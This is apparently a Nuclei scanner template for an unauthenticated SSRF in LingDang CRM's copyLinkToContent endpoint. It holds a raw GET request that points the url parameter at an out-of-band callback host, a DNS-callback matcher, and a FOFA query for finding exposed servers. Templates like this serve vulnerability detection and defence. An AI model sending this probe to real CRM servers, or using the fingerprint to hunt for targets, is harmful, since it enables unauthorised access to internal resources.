http:
    - matchers:
        - dsl:
            - status_code==200 && contains(interactsh_protocol, "dns")
          name: SSRF
          type: dsl
      raw:
        - |
          GET /crm/WeiXinApp/marketing/index.php?module=Articles&action=copyLinkToContent&url=http://{{interactsh-url}} HTTP/1.1
          Host: {{Hostname}}
id: LingDang-CRM-copyLinkToContent-SSRF
info:
    author: HuanXiong
    description: |-
        fofa: body="crmcommon/js/jquery/jquery-1.10.1.min.js" || body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js" || title="灵当CRM"
        灵当CRM copyLinkToContent 接口存在服务器请求伪造漏洞。因此攻击者可利用该漏洞在未经身份验证的情况下访问某些受限资源.获取内部服务器信息，使系统处于极不安全状态。
    name: 灵当CRM copyLinkToContent SSRF
    reference:
        - null
    severity: high
    tags:
        - SSRF
        - 灵当CRM
        - jQuery
